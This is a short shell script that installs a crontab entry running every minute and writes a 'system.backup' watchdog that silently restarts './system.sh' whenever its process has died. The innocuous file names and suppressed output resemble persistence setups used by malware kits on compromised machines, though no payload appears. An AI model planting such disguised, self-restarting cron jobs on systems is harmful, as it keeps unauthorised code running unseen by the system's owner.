#!/bin/sh
pwd > new.dir
dir=$(cat new.dir)
echo "* * * * * $dir/system.backup >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep system.backup
echo "#!/bin/sh
if test -r $dir/system.pid; then
pid=\$(cat $dir/system.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./system.sh &>/dev/null" > system.backup
chmod u+x system.backup

